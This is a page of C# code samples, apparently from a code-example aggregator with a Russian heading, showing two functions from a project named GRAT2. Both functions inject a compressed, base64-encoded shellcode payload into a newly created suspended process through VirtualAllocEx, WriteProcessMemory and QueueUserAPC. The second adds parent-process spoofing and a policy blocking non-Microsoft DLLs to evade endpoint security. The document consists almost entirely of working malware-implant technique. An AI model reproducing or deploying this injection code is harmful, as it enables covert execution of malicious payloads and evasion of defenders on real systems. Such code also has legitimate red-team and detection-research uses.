C# (CSharp) flags.PROCESS_INFORMATION примеры использования

Пример #1

Файл: UserAPC.cs Проект: zshell/GRAT2

        public static string InjectAPC(string[] arguments)
        {
            string targetProcess = arguments[2].Replace('+', ' ');

            byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
            IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
            IntPtr lpThreadId             = IntPtr.Zero;
            uint   oldProtect             = 0;

            STARTUPINFOEX si = new STARTUPINFOEX();

            flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();

            var processSecurity = new flags.SECURITY_ATTRIBUTES();
            var threadSecurity  = new flags.SECURITY_ATTRIBUTES();

            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength  = Marshal.SizeOf(threadSecurity);

            GCHandle handle       = GCHandle.Alloc(buffer, GCHandleType.Pinned);
            IntPtr   pinnedBuffer = handle.AddrOfPinnedObject();

            try
            {
                bool   success      = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
                IntPtr resultPtr    = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
                IntPtr bytesWritten = IntPtr.Zero;
                bool   resultBool   = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);

                IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);

                resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);

                IntPtr ptr          = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
                IntPtr ThreadHandle = pi.hThread;
                Interop.ResumeThread(ThreadHandle);

                handle.Free();
            }
            catch (Exception ex)
            {
                handle.Free();
                Console.WriteLine(ex.Message);
            }

            return(null);
        }

Пример #2

Файл: UserAPCPPID.cs Проект: zshell/GRAT2

        public static string InjectAPCPPID(string[] arguments)
        {
            string targetProcess = arguments[2].Replace('+', ' ');

            byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
            var    blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
            int    parentId = SearchPID.SearchForPPID();
            IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
            IntPtr lpThreadId             = IntPtr.Zero;
            uint   oldProtect             = 0;
            var    lpValueProc            = IntPtr.Zero;

            STARTUPINFOEX siEx = new STARTUPINFOEX();

            flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();

            var processSecurity = new flags.SECURITY_ATTRIBUTES();
            var threadSecurity  = new flags.SECURITY_ATTRIBUTES();

            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength  = Marshal.SizeOf(threadSecurity);

            GCHandle handle       = GCHandle.Alloc(buffer, GCHandleType.Pinned);
            IntPtr   pinnedBuffer = handle.AddrOfPinnedObject();

            try
            {
                var lpSize = IntPtr.Zero;
                Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
                siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
                Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);

                if (IntPtr.Size == 4)
                {
                    Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
                }
                else
                {
                    Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
                }

                Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
                var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
                lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
                Marshal.WriteIntPtr(lpValueProc, parentHandle);

                Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

                bool   success      = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
                IntPtr resultPtr    = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
                IntPtr bytesWritten = IntPtr.Zero;
                bool   resultBool   = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);

                IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);

                resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);

                IntPtr ptr          = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
                IntPtr ThreadHandle = pi.hThread;
                Interop.ResumeThread(ThreadHandle);

                handle.Free();
            }
            catch (Exception ex)
            {
                handle.Free();
                Console.WriteLine(ex.Message);
            }

            return(null);
        }